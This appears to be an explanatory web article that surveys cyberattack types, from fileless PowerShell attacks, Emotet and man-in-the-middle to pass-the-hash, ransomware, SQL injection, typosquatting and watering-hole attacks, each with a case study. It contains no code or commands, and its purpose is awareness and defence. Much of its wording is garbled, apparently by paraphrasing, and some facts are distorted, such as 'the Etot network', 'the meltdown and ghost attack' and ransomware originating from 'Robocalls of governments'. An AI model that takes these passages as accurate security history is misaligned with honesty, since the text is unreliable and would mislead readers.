Given that most workplace computers use PowerShell, a scripting language, and that most businesses don’t keep an eye on code endpoints, the reasoning behind this kind of assault is rather evident. Accessing the system is simple, and it’s even simpler for attackers to establish a foothold there. Installing malware is not necessary for the harmful script to operate or be carried out. This implies that the hacker may easily evade detection and avoid having executable files analyzed, allowing them to wreak havoc whenever they choose.

Where the attack originates:
Compared to other approaches, this kind of attack is more complex and is typically carried out by a skilled power hacker (as opposed to a novice who could use brute force attacks).
They always approach with subtlety, are skilled at hiding their tracks, and are able to maneuver laterally through a network.

Malware

Emotet is a form of malware that was first discovered in 2014 as a banking trojan that was intended for consumers. However, it has since repurposed itself into a persistent and widespread threat to both the public and private sectors. According to the Department of Homeland Security, Emotet is among the most expensive and harmful malware varieties, with an average cost of $1 million each incidence.
Emotet has targeted private sector businesses in the manufacturing, financial services, pharmaceutical, and technology sectors in addition to government organizations in France, Japan, Canada, and New Zealand. In February 2021, communications on the Etot network were stopped by law enforcement agencies from the United States and Europe, thereby stopping its spread. In 2023, Emotet reappeared and the botnet resumed its dubious activities.

What you need know is that different kinds of malware enable unauthorized remote access to a target’s device, backdoor administrative control, and espionage. After taking over the targeted machine or machines, the attackers can alter files, install and uninstall applications, take over webcams, and steal sensitive information such as login credentials. In order to quickly download more malware and compromise other computers and devices on the network, hackers might also pose as authentic users.

How the attack takes place:
Advanced phishing strategies are used to propagate malware, which is made to steal sensitive data such as user credentials, screenshots, webcam access, audio, geolocation, and keylogging information. One of their most popular phishing strategies involves tricking people into opening files disguised as Word and PowerPoint documents from Microsoft Office. In addition to conventional remote service-based exploitation, attackers can now use spearphishing operations and drive-by downloads to infect businesses with malware.

Where the attack originates: This strategy is both sophisticated and widespread due to the widespread use of malware. Make sure the email is coming from a reliable source before opening any dubious-looking emails in your inbox with a file extension, as doing so could introduce malware into your network.

Man-inthe-Middle Attack

Microsoft found evidence of a phishing campaign aimed at Office365 users early in 2022. The attackers collected login credentials by creating a fake 365 login page, which they would then use and abuse.
In order to accomplish this, the attackers hijacked the authentication process using an Evilginx2 phishing kit, a man-in-the-middle (MITM) attack framework used for phishing login credentials along with session cookies, allowing bad actors to overcome two-factor verification. In their blog post, Microsoft also stated, “Remember that this is not a vulnerability in MFA; the attacker gets authenticated to a session on the user’s behalf, regardless of the sign-in method the latter uses, since AiTM phishing steals the session cookie.”

What you should know: An adversary-in-the-middle (AiTM) attack, also called an MITM attack, involves the setup of a proxy server that intercepts the victim’s log-in session. This allows the malicious actor to act as a relay between the two parties or systems, allowing them to access and/or steal confidential data. With this kind of attack, a malevolent actor can send and receive data that is meant for someone else or isn’t meant to be sent at all, all without the other party’s knowledge until it is too late.

How the attack is carried out: A man-in-the-middle assault can be carried out by almost anybody. However, once HTTPS Everywhere was put into place, these attacks are harder to carry out and, as a result, less common. In a Man-in-the-Middle (MITM) attack, the hacker positions himself in between the user and the legitimate website, or another user, and transfers data between them, extracting any desired data from the exchange.

Where the attack originates: Only experienced hackers or state actors are attempting MITM attacks these days due to the increased difficulty of executing them brought about by security technology advancements. Four members of the Russian hacker outfit Fancy Bear were discovered by the Dutch police in 2018 parked outside the Organization for the Prohibition of Chemical Weapons in Holland, attempting to obtain employee credentials through an MITM penetration. The Russian state-sponsored actors were actively targeting routers in homes and businesses with the intention of MITM exfiltration, the US and UK governments warned later that year.

Masquerade Attack

Frequently, con artists pose as representatives of software businesses to trick gullible people into installing malicious software that appears as email attachments. Adobe and Microsoft were involved in one recent trend. An well-known antivirus and security business, Avast, revealed in early 2023 that “scammers send out Microsoft OneNote files as email attachments to victims, triggering malware downloads when someone opens the attachment.” Masquerade attacks have been increasing ever since.

What you should know: A masquerade attack occurs when a malevolent actor obtains unauthorized access to a person’s computer or an organization’s network by using a lawful access identifier that has been fabricated or stolen. Masquerade attacks have the potential to grant attackers access to the whole network, depending on the level of access granted by the permissions.

How the attack occurs: It is possible for a masquerade attack to occur as a result of stolen user credentials or as a result of authenticating on unsecured computers and devices that are connected to the target network.

Where the attack originates: By utilizing keyloggers to obtain authentic authentication credentials or by impersonating login domains, attackers can gain access from an insider perspective. Physical attacks can also occur when attackers prey on people who leave their computers unattended, such as when a colleague uses a victim’s laptop while they’re away. Generally speaking, the root of the issue is typically inadequate authentication techniques that are easily exploited by outside parties.

Meltdown and Spectre Attack

The majority of cybersecurity assaults take advantage of a weakness, either a coding error or poor design. However, not every attack is made equal. Two Google researchers found a new kind of attack that may possibly expose billions to the meltdown and ghost attack, affecting all computer chip manufacturers.

What you should know: Computer processor vulnerabilities are exploited by the meltdown and spectre attack. Attackers can virtually take advantage of these flaws to steal any data that the machine is processing. This attack targets the fundamentals of computer security, which depends on memory segregation to safeguard user data. A “spectre” denotes a breakdown between two applications that conceal information from one another, but a “meltdown” denotes the failure of any protective barrier between an operating system and a program.

How the attack takes place:
Meltdowns and spectre attacks take advantage of serious flaws in contemporary CPUs that let unauthorized users access data stored in memory.
The exploit violates the standard computing practice that prohibits programs from reading data from other programs. Passwords kept in a browser or password manager, emails, bank statements, and private data like images and instant chats are the kinds of data that hackers usually target. However, this assault is not just happening on desktop PCs. It can target nearly any processor-equipped device, including tablets and smartphones.

Where the attack originates: The spectre and meltdown attack might come from almost anywhere, and the majority of the study done so far has concentrated on the distinctive characteristics of this attack rather on its perpetrator.

Network Sniffing

A new breed of gadget called smart locks is designed to protect your house and make it easier to access with only a button click—or, perhaps more accurately, a touch.
However, security specialists have shown that securing your home in a more futuristic manner can have detrimental effects. Network traffic between the mobile app and the smart lock itself might be intercepted by one smart lock, which is not exactly touted as the “smartest lock ever.” Even more terrifying, network-sniffing devices that are easily accessible and affordable can be used for this.

What is essential to know:
Data moving within a network is captured, monitored, and analyzed in real-time by a process called network sniffing, also referred to as packet sniffing. Vulnerable actors use sniffing tools to intercept unencrypted data from network packets, including passwords, emails, messages, and other sensitive information. They can do this with hardware, software, or a combination of both.

How the attack works: Network sniffing operates in the background, surreptitiously listening in as information is transmitted between entities on a network, much like wiretapping scenarios in which someone listens in on phone calls for crucial facts. This occurs when an attacker installs software or plugs in hardware to set up a sniffer on a network, enabling it to log and intercept traffic via any wired or wireless network that the host device is connected to.
Because most networks are complicated, sniffers can remain on the network for a very long time before being discovered.

The source of the attack: Businesses that require network traffic verification, such as ISPs, advertising firms, government agencies, and others, frequently engage in lawful network sniffing.
However, hackers acting for fun or nation-states attempting to steal intellectual property can also start it. Similar to ransomware, network sniffers can infiltrate a network by tricking the appropriate individual into clicking on the incorrect link. Access to sensitive hardware via insider threats may also serve as an attack vector.

Open Redirection

Another phishing attempt that targeted Facebook users was found to have obtained hundreds of millions of login credentials in 2022. The method was standard: a link is given by direct message (DM) from a Facebook account that has been compromised. The link then goes through a number of redirections, frequently using malvertising pages to increase views and clicks (and income) for the attacker, until it lands on a bogus page. Even though host redirection, sometimes referred to as open redirect, is not a novel approach, the scope of this effort is astounding.
Out of over 400 phishing landing pages, researchers discovered that just one had 2.7 million visitors in 2021 and 8.5 by June 2022. The attacker claimed to make $150 for each thousand US Facebook user visits in an interview with researchers. This would translate to a total earnings of $59 million for the bad actor.

What you should know: As hackers get more inventive in how they entice their victims, host redirection attacks are becoming more frequent and disruptive.
Before they eventually launch their attack, attackers employ URL redirection to win over a user’s trust. Usually, they will utilize phishing techniques, a.htaccess file, or embedded URLs to divert visitors to a malicious website.

How the attack is carried out: The hacker may send the gullible victim a phishing email that has a duplicate URL for the website. By completing any forms or prompts that may appear, visitors may unintentionally provide personal information if the website looks authentic. By including fictitious command-and-control domains in malware and displaying harmful information on domains that superficially resemble business servers, attackers can escalate this further.

Source of the attack: The target is more significant than the attack’s origins. Usually, the target of this attack is inexperienced internet users who won’t realize that the URL of their preferred domain is misspelled by one or two letters. Furthermore, this attack can come from practically anywhere because it takes pride in its simplicity—registering a domain name is all it takes to launch one.

Pass the Hash

Part of the reason for the success of the well publicized Target customer account hack was the widely used attack method known as pass the hash (PtH). By using PtH, the hackers were able to obtain an NT hash token, which gave them the ability to log in to the Active Directory administrator’s account without needing the plaintext password. This gave them the authority to make a new domain admin account and add it to the Domain Admins group. They were able to obtain Target customers’ payment card numbers and personal information thanks to this flaw in the system.

What is essential to know:
Bypassing the plaintext password and using the underlying NTLM or LanMan hash, an attacker can authenticate a user’s password. The hacker can easily access the user’s account and carry out actions on local or remote systems once they have a valid username and the hash values of their password.
Hashed passwords basically take the place of the original passwords from which they were derived.

The attack takes place as follows: A user’s password or passphrase is never entered in cleartext on systems that use NTLM authentication. Rather, in response to a challenge-response authentication scheme, it is delivered as a hash.
When this occurs, a credential access approach is employed to obtain valid password hashes for the account being used.

Where the attack originates: This kind of attack is more sophisticated than previous approaches, and it is typically carried out by highly motivated, well-organized threat groups that have their eyes set on a particular individual or organization and are hoping to obtain financial or political advantage.

Phishing

Twilio, a platform for customer engagement, had its second significant hack in June 2022. The hackers known as “0ktapus,” who were in charge of both instances, used voice phishing, or posing as Twilio’s IT department over the phone, to trick an employee and obtain client data. The staff member gave the theat group the corporate login credentials, believing they were conversing with an authorized official. Due to this compromise, a small number of client contact details were accessed without authorization.

What you should know: Phishing attacks use email, direct messaging, or other forms of communication to trick common users, consumers, or employees into clicking on a malicious link that will often take them to a phony website asking for personally identifiable information like credit card numbers, bank account numbers, or passwords. Be cautious since, despite their plausible appearance, these fraudulent websites will collect any personal data you provide. Alternatively, they might start a virus campaign to steal money from your accounts, personally identifiable consumer data, or other important resources.

How the attack works: Usually, you’ll be tricked into opening malicious attachments or clicking links that take you to websites that are almost exact replicas of trustworthy websites by means of an email that purports to be from a boss or colleague.

Where the attack originates: A few decades ago, the Nigerian criminal code designated some types of fraud as 419 schemes, which led to a significant amount of phishing assaults coming from Nigeria. According to the InfoSec Institute, phishing assaults nowadays come from all over the world, with a large number happening in the BRIC (Brazil, Russia, India, and China) nations. Phishing campaigns can be started by hackers with little technological expertise due to the accessibility and ease of use of phishing toolkits. These efforts are being run by a variety of actors, including organized cybercriminals and lone hackers.

Phishing Payloads

A novel phishing attempt has surfaced, ascribed to the threat group TA866, in which victims’ devices are screenshotted by an initial malware payload. This enables the attackers to determine whether additional malware should be installed and assess the victim’s prospective value. Over a thousand American and German groups have been the focus of this effort thus far.

What you should know: Phishing is still the most common and harmful cyberthreat, despite its apparent simplicity. Phishing emails are actually the starting point of up to 91% of successful attacks, according to studies.
The senders of these emails may pose as recognizable contact names, utilize email scraping techniques, use bogus domains, and employ other strategies to trick their victims into opening an attachment that contains a harmful payload, clicking on a dangerous link, or providing sensitive personal information that could be intercepted by the attackers. The transferred data that contains the intended message is referred to as the “payload.”
Only in order to facilitate the payload’s delivery to the intended recipient, headers and metadata are transmitted.

How the attack takes place:
This attack follows a standard pattern of attack: The attacker sends a phishing email first, and the target downloads the attached file—usually a.docx or.zip file with an embedded.lnk file—after seeing the email. The attack is successful when the.lnk file initiates a PowerShell script that, in turn, initiates a reverse shell.

Where the attack originates: Since phishing is the foundation of most cyberattacks, this attack can come from anywhere in the world because it doesn’t require a high level of sophistication.

Spear Phishing

In addition to going after larger targets these days, spear phishers are also adopting a tactic from romance scams, enticing victims with eye-catching false profiles in order to trick them into downloading malware onto their machines.
Researchers discovered a multi-year social engineering and targeted malware campaign associated with the well-known threat actor TA456, which is affiliated with the Iranian regime. Through the use of a fictitious social media account named “Marcella Flores,” TA456 established a love connection with a worker at a tiny subsidiary of an aerospace defense firm. A few months later, the attacker made a profit by transmitting a sizable malware file through an active business email chain in an attempt to carry out reconnaissance.
After the malware, known as LEMPO, gained access to the computer, it exfiltrated data and transmitted extremely private information to the attacker.

What is essential to know:
Spear phishing is a subset of phishing in which cybercriminals deliberately target you with a tailored email message in an attempt to fool targets or employees of a target firm into divulging confidential or financial information or granting access to the network. Spear phishers target people who are either weak links in the network or have access to sensitive information. Targets with high value, including C-level executives, board members, or administrators with special access, are more susceptible since they have access to confidential data and vital systems.

How the attack takes place:
Spear phishers use social media platforms like LinkedIn to conduct research on targets and their professional positions. They then use fictitious addresses to send extremely tailored, convincing-looking communications that penetrate the target’s systems and infrastructure. After gaining access to the environment, hackers try to execute even trickier plans.

Where the attack is coming from: Both people and groups are responsible for this attack. Nonetheless, a lot of well-publicized spear phishing attempts are outsourced to state-sponsored cybercrime groups, who have the means to investigate their targets and get past robust security measures.

Whale Phishing<br>(Whaling)

When you can phish a whale, why chase after tiny phish? That was discovered the hard way for Australian hedge fund Levitas Capital when hackers launched a covert whaling operation that was targeted directly at one of the founders. The malicious actors infiltrated the hedge fund’s network by sending the executive a phony Zoom link, which, when opened, downloaded malware. Through the use of malicious code, the attackers were able to gain access to the intended email account and produce false invoices that were sent to the trustee and third-party administrator of the fund. These individuals then approved and started requests for financial transfers, which led to the theft of $8.7 million. A request for a $1.2 million payment to the dubious private equity business Unique Star Trading was also included in the fake invoices. The company was ultimately forced to permanently close as a result of the severe and massive losses.

What you should know: A single, high-value target, such the CEO of a financial services company, is the objective of a whale attack. A phishing email may target any employee at the organization, but the target is always someone particular. Additionally, because high-profile targets may hold sensitive or vital information, hackers typically target them.

How the attack is carried out: A whaling attack employs a traditional phishing approach. The victim receives what appears to be a real email requesting him or her to click on a link that takes them to a website that requests sensitive data, like a password, or contains dangerous code.

Where the attack originates:
Since phishing is the most frequent way for cyberattacks to start, a whaling attack might come from anywhere in the globe.
For instance, the Levitas Capital attack was attributed to a group of cybercriminals from different parts of the world, and payments were made to United Overseas Bank in Singapore and Bank of China.

Privileged User Compromise

In 2022, Okta, a single sign-on provider used by thousands of businesses and governments globally, was successfully hacked, according to public boasts made by the criminal hacking group Lapsus$, which was purportedly led by a teenage boy from Oxford, England. Lapsus$ was able to access the employee’s laptop for five days, including privileged access to certain Okta systems, after gaining access to a “super user” administrative account for Okta through a third-party support engineer. On its Telegram channel, the cybercrime organization shared information about the hack. They even included screenshots demonstrating that the attack was inside Okta’s servers. However, the real objectives were Okta’s 15,000 clients rather than Okta itself. A week later, the hacking gang gained 15,000 new followers on Telegram, igniting speculation about impending strikes.

What you should know: It’s commonly acknowledged that the misuse of privileged credentials is a major contributing factor in many significant data breaches. These are user accounts with higher privileges, like root or domain administrator accounts. Attackers are increasingly gaining access to an organization’s data and resources by utilizing privileged user credentials to steal confidential information. With privileged user credentials, an attacker can take over an organization’s infrastructure and change security settings, steal data, establish user accounts, and more, all while seeming authentic and making themselves more difficult to find.

How the attack takes place:
Via the use of malware, spear-phishing emails, social engineering tactics, or “pass the hash” attacks, attackers try to obtain access to privileged accounts. In order to accommodate a workforce that is becoming more mobile and dispersed, organizations have opened their networks, allowing suppliers and service providers to access a complicated web of remote access. There are many of those connections, including those to the cloud, that require strong privileged account credentials to access. It can be difficult to identify, regulate, and monitor access to all of those connections, which provides opportunities for bad actors.

Attackers enter after gaining the credentials and take whatever they can, including SSH keys, certificates, and domain administration hashes. Furthermore, all it takes for a significant data breach that can bring down a whole corporation is one successful account hit.

Where the attack originates: User compromise is widely appealing and frequently used in cyberattacks of various kinds, whether nation-state cyber espionage motivated by political ideology or sophisticated, financially motivated cybercrime groups like Lapsus$. This is because it gives attackers hard to detect, wide access to all kinds of data privilege.

Ransomware

Ransomware attacks impacted at least 948 government entities, educational institutions, and healthcare facilities in the US in 2019, potentially costing over $7.5 billion, according to cybersecurity firm Emsisoft.
These attacks could have the following effects on the medical field: patients could be sent to other hospitals; medical records could become inaccessible or lost forever; and emergency dispatch centers could be forced to track emergency responders in the field using paper logs and printed maps.
Local 911 services may be interrupted by the government. Furthermore, ransomware might have an impact just as severe and expensive as a natural calamity like Hurricane Sandy, according to Manhattan District Attorney Cyrus Vance Jr.

What you should know: Ransomware is an assault in which the victim’s data is encrypted by an infected host and held captive until the attacker is paid a ransom. Recent ransomware attacks have shown that hackers are threatening to sell or release the stolen data, which greatly increases the potential damage that these types of assaults can do.
Although there are many different kinds of ransomware, some are particularly malicious. A well-known gang called Blackmatter has targeted several businesses that are vital to the American infrastructure and economy, such as the food and agriculture sector. Another kind of ransomware to be wary about is Ryuk. With a $12.5 million ransom, Ryuk had the biggest ransom on record as of 2019.

How the attack is carried out: In addition to standard remote service-based exploitation, attackers can use spear phishing campaigns and drive-by downloads to infect individuals and enterprises with ransomware. After the virus has been placed on the victim’s computer, it either shows a pop-up window or takes the user to a website where it notifies them that their files are encrypted and that they can only unlock them by paying a ransom.
On the other side, ransomware operators and affiliates use a business model called Ransomware as a Service (RaaS), in which affiliates pay to initiate ransomware attacks that the operators have created. RaaS kits enable affiliates to get up and running quickly and economically even if they lack the expertise or time to create their own ransomware variation. User reviews, forums, bundled deals, round-the-clock assistance, and other features that are similar to those provided by reputable SaaS providers can all be found in a RaaS kit.

Where the attack originates: Robocalls of governments or large corporations requiring sophisticated technology have been the domain of sophisticated cybercriminals, who then go unidentified.
But with the introduction of cryptocurrencies, which make anonymous transactions easier, ransomware attacks are becoming more commonplace for the general public.
RaaS kits are routinely marketed on the dark web and are quite easy to use, thus any novice hacker with the funds to purchase one might launch an attack.

Router and Infrastructure Attacks

An infrastructure and router attack that targeted Cisco involved a router “implant” known as SYNful Knock, which was allegedly present in 14 routers across four nations. Through the use of a modified Cisco IOS software image, SYNful Knock is a sort of persistent malware that enables an attacker to take control of an infected device and compromise its integrity.
According to Mandiant, the device is activated via specially constructed TCP packets that are transmitted to it, and several modules that are enabled using the HTTP protocol.

What you should know: Router implants are thought to be primarily theoretical in nature and use, and they have been extremely unusual.
But according to recent vendor alerts, they have been spotted in the wild. Attackers most likely gain access to these devices by finding well-known flaws or by focusing on those with easy-to-guess default passwords.
The router is a prime target for re-entry or additional infection because of its location inside the network.

How the attack takes place:
Networking equipment, including switches and routers, is frequently disregarded as a tool that hackers could use to compromise a company. Once network devices are compromised, attackers can gain direct access to the internal infrastructure of the business, thereby expanding the attack surface and gaining access to private services and data.

The source of the attack is these crucial assets, which have been frequently targeted by advanced threat actors who use them to siphon off and reroute network traffic, flash backdoored OS systems, and use cryptographically weak techniques to make it easier to decode network traffic.

Shadow IT

With the increased speed and ease of use of software as a service (SaaS) applications, employees can now download solutions directly onto their workstations to assist in completing tasks. Many people, nevertheless, are utilizing these apps carelessly when it comes to security. According to a Forbes Insights survey titled “Cyber Resilience Perception Gaps: What Could Go Wrong?“, more than one in five firms reported having encountered a cyber event that started with an unapproved, or “shadow,” IT resource. This finding is not surprising.

What is essential to know:
The term “shadow IT” describes IT programs and systems that staff members utilize without the IT department’s knowledge or approval. These can consist of additional programs, web services, cloud apps, hardware, and software. Typically, these programs are downloaded and used by well-meaning workers who want to simplify or expedite their work. Shadow IT is such a widespread phenomena that, according to Gartner, it accounts for one-third of all enterprise cybersecurity assaults. Users frequently unknowingly open the door for insider threats, data breaches, and compliance issues because they are using these apps mostly beneath the radar.

How the attack takes place:
As the term implies, employees exchanging or keeping data on unapproved cloud services is the reason behind shadow IT’s secrecy, which creates a number of security and compliance issues.
When workers upload, distribute, or store sensitive or regulated data into shadow IT apps without the proper security and data loss prevention (DLP) measures in place, breaches may happen. The information that is made public subsequently becomes a prime target for data theft and insider threats, and it may also result in expensive compliance violations. Furthermore, there may be security flaws and endpoint vulnerabilities in the apps themselves.

Where the attack originates: In this instance, an organization is the source of the threat. Workers that use shadow IT apps typically do so to get around restrictive policies or to complete tasks more quickly; they are not always doing so to endanger their companies or fellow employees. They eventually do, however, offer a large opening for malevolent insiders or outside hackers attempting to take advantage of security flaws in these systems.

Simjacking

A group of hackers known as the “Chuckling Squad” released a barrage of extremely nasty messages to Twitter CEO Jack Dorsey’s 4.2 million followers on August 30, 2019. After obtaining Dorsey’s phone number through simjacking, the group used a text-to-tweet service that Twitter had purchased to broadcast the messages. Millions of people saw the inflammatory tweets, even though they were only available online for less than 10 minutes.

What is essential to know:
SIMjacking is a sort of account takeover that typically targets a hole in two-factor authentication and two-step verification in which the second factor is a text message (SMS) or call to a mobile phone. It is also known as a SIM swap scam, port-out scam, SIM splitting, and SIM swapping. Simjacking, to put it simply, is the act of an attacker posing as a target to a cellular provider in order to obtain the target’s phone number and have it moved to a new SIM card (which the hacker already has).

How the attack takes place:
Pretending to be the target, a hacker phones a cell service provider’s help line and reports that they have misplaced their SIM card. Because they have obtained some of the target’s personal data (passwords, address, or SSN) through one of the numerous database breaches that have occurred over the past ten years, they are able to authenticate their identity. The employee of the service provider flips the switch because they have no means of knowing that the person on the other end of the line is not who they claim to be. That phone number, which is the secret to so much of modern life online, is suddenly in the attacker’s hands.

Where the attack originates: Most often, scammers try to coerce victims into parting with extremely valuable assets (such as high-value social media accounts, Bitcoin wallets, or other cryptocurrency wallets) or destroy their reputations (like Chuckling Squad did with Jack Dorsey). These hackers might be lone individuals or members of formal groups, and they can originate from anywhere in the world.

Social Engineering Attack

A social engineering attack cost CoinsPaid, a cryptocurrency payment system, $37 million in July 2022. The threat actors tricked an employee into installing malicious software on their work computer before making a fictitious job offer. The company stated, “Although you may think that such an attempt to install malicious software on the employee’s computer is obvious,” the hackers had spent six months gathering as much information as they could about CoinsPaid, our team members, our organizational structure, and other details.

What you should know: The term “social engineering” refers to a wide range of malevolent operations carried out by psychological manipulation to deceive users into divulging sensitive information or committing security blunders. The fact that social engineering depends more on human error than on flaws in operating systems and software makes it particularly dangerous. Unlike malware-based intrusions, mistakes committed by authorized individuals are considerably less predictable, making them more difficult to detect and stop.

How the attack is carried out: Social engineering attacks can be carried out anyplace there is human interaction. They can take many different shapes. Here are five typical ways that social engineering attacks occur online.
To obtain the background knowledge required to carry out the assault, such as potential points of entry and lax security standards, a perpetrator first looks into the intended victim.
After gaining the victim’s trust, the attacker then acts as a catalyst for more activities that violate security protocols, including disclosing private information or allowing access to vital resources.

Where the attack originates: Social engineering can originate from a variety of places and have a wide range of goals. It usually takes the shape of phishing emails.
Additional methods include tailgating or piggybacking, which is when an attacker enters a restricted area of a business by following an authenticated employee through secure doors; pretexting, in which the attacker crafts a plausible pretext to steal crucial data; and baiting and quid pro quo, in which the attacker offers the victim something desirable in exchange for providing login credentials.

Spyware

It’s no secret that spyware attacks are still happening far too frequently. However, you’re probably a bigger target if you’re a well-known person. Authorities declared that malevolent actors had used the Pegasus spyware to target the cellphones of Spanish Defense Minister Margarita Robles and Prime Minister Pedro Sánchez on multiple occasions. This led to a considerable loss of data from both phones and caused severe disruptions to Spain’s government systems and administrators.

What is essential to know:
Malware that tracks or sells a victim’s online behavior (such as searches, history, and downloads), obtains bank account information, and even attempts to steal a target’s identity is known as spyware. There are several varieties of spyware, and they all use different methods to follow their targets. In the end, spyware has the ability to take control of a device and exfiltrate data or communicate private information to an unidentified third party without the user’s knowledge or consent.

How the attack is carried out: Although spyware can be installed on a victim’s device in a number of ways, it usually gains access to a system by tricking the target or taking advantage of security holes in the system. This can occur when a user opens email attachments from unfamiliar senders, downloads software or updates from dubious sources, accepts prompts or pop-ups without thinking, or steals films and music.

Where the attack originates: With the widespread availability of crimeware kits, an attack of this nature can originate from any location. However, the majority of the time, they come from malicious companies hoping to sell a victim’s personal data to another party.

SQL Injection

The common programming language for interacting with relational databases, or SQL (also pronounced “sequel”), is used to interface with these systems, which underpin all data-driven websites and online applications. By inserting a specific SQL query into the form (thereby injecting it into the database), an attacker can exploit this (quite popular) system and gain access to the database, servers, and network. Furthermore, SQL injection assaults are still a common form of attack. In August 2020, the Freepik Company announced a data breach that affected over eight million user logins. The breach was caused by a SQL injection in a global database of customizable icons, which gave hackers access to user login credentials and personal data.

What you should know: SQL injection is a kind of injection attack where malicious SQL statements are used to alter or destroy databases. If user inputs are not properly sanitized, SQL statements can be utilized to circumvent security safeguards as they manage the database of your web site.

How the attack is carried out: An SQL injection attack involves “injecting” or inserting a SQL query into the program through input data from the client. A successful SQL injection exploit can get the contents of a specific file located on the DBMS file system, read and alter sensitive data from databases, perform database management tasks, and in certain situations, send commands to the operating system.

Where the attack originates: SQL injection attacks are quite popular since relational databases provide the foundation of so much of the internet. Finding “injection” in the Common Vulnerabilities and Exposures database yields 15,000 results.

Supply Chain Attack

A supply chain attack can do a great deal of harm, as demonstrated by the SolarWinds strikes, which some experts have dubbed the worst cyberattack series in history. 2020 saw the penetration of SolarWinds software by experienced attackers who were allegedly under the influence of the Russian spy service.
They installed malware on it, which was subsequently made available through a product update, providing them backdoor access to all of the networks of SolarWinds Orion Platform users. Up to 18,000 users—including Fortune 500 corporations and numerous US government agencies—installed updates that made them susceptible to hackers. It’s truly your worst nightmare, as SolarWinds vice president of security Tim Brown put it.

What you should know: A supply chain attack is a potent cyberattack that can get past even the most advanced security measures by using reputable third-party suppliers. Vendors frequently lose their customers’ data in a cyberattack because they require access to sensitive data in order to interface with their customers’ internal systems. Additionally, a single supply chain attack allows hackers access to the sensitive data of several companies in a variety of industries because vendors hold sensitive data for numerous clients. One cannot stress how serious supply chain attacks are. Furthermore, the recent wave of these assaults implies that state actors are increasingly using this strategy as their go-to approach.

How the attack occurs: A supply chain attack targets the vendor’s software source code, updates, or build procedures in order to obtain complete access to the data of the company through the use of reputable, trusted processes. Their occurrence at an angle to the assault surface makes them hard to detect. Then, unintentionally, compromised vendors spread malware throughout the networks of their clients. Malware on linked devices, third-party software updates, and program installers can all compromise victims’ security.
With little work on the part of the hacker, who now has “legitimate” access to migrate laterally across thousands of firms, a single software update can infect thousands of organizations.

Where the attack originates:
Supply chain assaults are large-scale, highly skilled attacks carried out by highly skilled threat actors; these attacks are frequently sponsored by nation-states and driven mostly by ideology, though money is also a major factor.

Suspicious Cloud Storage Activities

The 2022 Verizon Data Breach Investigations Report (DBIR) states that 82% of breaches had a “human element,” and that misconfigured cloud storage is to blame for an increase in “miscellaneous errors.”
The majority of security and IT professionals (67%) store sensitive data in public cloud environments, according to the Sensitive Data in the Cloud report. Additionally, one-third of respondents expressed lack of confidence or only slight confidence in their ability to protect sensitive data in the cloud.
This kind of technological and professional error is precisely the reason why cloud accounts have become a hot commodity in this age of remote work, whether it is due to a misconfigured database or insufficiently skilled security staff.

What you should know is that attackers have plenty of chance to locate and take advantage of both known and undisclosed vulnerabilities because data is now extensively (and much too frequently, recklessly) scattered across the cloud.
This is particularly true as businesses rush to move to the cloud, thereby compromising or configuring security settings incorrectly.
Cloud service providers (CSPs) will cover certain elements, processes, and functions; however, the customer is responsible for securing its proprietary data, code, and any other assets of note, according to the cloud security alliance (CSA). This further complicates matters. Assets and applications need to be secured in accordance with the shared responsibility model.
But there will always be hackers when that duty is shied away from.

How the attack happens: When a malicious actor gains access to a company’s cloud infrastructure because of misconfigured, shoddy, or nonexistent security settings, an assault on cloud storage occurs. As soon as they’re inside, they’ll begin turning off security measures like access monitoring. In order to maintain access, they might make new accounts and run commands that aren’t usual for the kind of user or system in question. They might also alter storage bucket restrictions to provide public access to an organization’s contents, which could result in data exfiltration. Thankfully, all of these occurrences are noteworthy and will be simple to follow and locate in the audit logs of the CSP.

Where the attack originates:
This can occur, for instance, when a developer uses an out-of-date instance of a cloud service or application. There may be known vulnerabilities in this that were fixed in a later release. However, since an outdated program is still active, attackers can leverage this as a point of access before branching out over the cloud infrastructure.

Typosquatting

A wrapper for the Roblox API, Noblox.js is a feature that many players use to automate interactions with the well-known Roblox gaming platform. There seems to be a new audience being drawn in by the software. Hackers used the noblox.js package to start typosquatting attacks in 2021. They did this by uploading packages that looked suspiciously similar but were actually loaded with ransomware to a registry for open-source JavaScript libraries. From there, they spread the malicious files via a chat service. But since September2021, gamer Josh Muir and a few others have been aggressively going after the attackers in an effort to stop the spread of ransomware via the noblox.js package and other code libraries, as well as to stop more attacks on the gaming community.

What you should know: Typosquatting is a type of phishing assault in which perpetrators use frequently misspelled domain names to their advantage. The guilty party frequently hopes that a business, brand, or individual will purchase the domain from them rather than really planning to launch an attack. However, in other instances, fraudsters fabricate rogue websites that bear striking resemblances to authentic trademarks.

How the attack is carried out: This is not a really clever attack. It may be as easy as a 14-year-old registering a domain name and then infecting it with malware. The malignant version of this attack typically entails a hacker tricking people into connecting with harmful infrastructure by using fictitious domains.
Human error occurs, even for users who are aware of these risks. Most adversaries are all too aware of this fact and will exploit it whenever they can. Examples of this include phishing with lookalike addresses, hosting malicious content on domains that closely resemble corporate servers, and embedding phony command-and-control domains in malware.

Source of the attack: The target is more significant than the attack’s origins. Usually, the target of this attack is inexperienced internet users who won’t realize that the URL of their preferred domain is misspelled by one or two letters. Furthermore, this attack can come from nearly anywhere due to its simplicity—it can be as simple as registering a domain name.

Watering Hole Attack

A Florida water and wastewater treatment facility contractor unintentionally hosted malicious malware on its website, which resulted in the alleged Oldsmar water plant hack in 2021 and what became a classic watering hole assault. The malicious code discovered on the contractor’s website also seemed to target other Florida water utilities, and it should come as no surprise that the same day the hack occurred, a browser sourced to the city of Oldsmar visited the website. This suggests that the cybercriminals behind the attack were targeting a specific audience. The website didn’t launch exploit code; instead, it injected malware that worked as a browser enumeration and fingerprinting script to gather data from users. This data included the type of browser, operating system, time zone, and whether or not the user had a camera and microphone. The data was then sent to a remote database hosted on a Heroku app site, which also contained the script.

What is essential to know:
Similar to a real watering hole, a watering hole attack occurs when a user visits a website that has malware on it, which then compromises their computer with the intention of infiltrating their network and stealing financial information or data. The particular method is basically a zero-day assault, with the intention of infecting the computer system and gaining access to a network in order to obtain confidential or financial data.

How the attack is carried out: The attackers first profile the victim to find out which websites they usually visit, and then they search for weaknesses.
The attacker compromises these websites by taking advantage of known vulnerabilities, then sits back and waits, knowing that the victim in question will eventually visit. The hacked website will then spread throughout their network, giving hackers access to their whole system and the ability to branch out to other systems.

Where the attack is coming from: Although the hackers behind it are global in scope, many of them are from countries like China, Russia, and Eastern Europe, where organized crime is rife. A nationwide watering hole attack in 2018 was traced to the Chinese threat group LuckyMouse (also known as Iron Tiger, “EmissaryPanda,” “APT 27,” and “Threat Group 3390“), which is well-known for using a variety of attacks, including watering hole assaults, to target the manufacturing, government, and energy sectors.

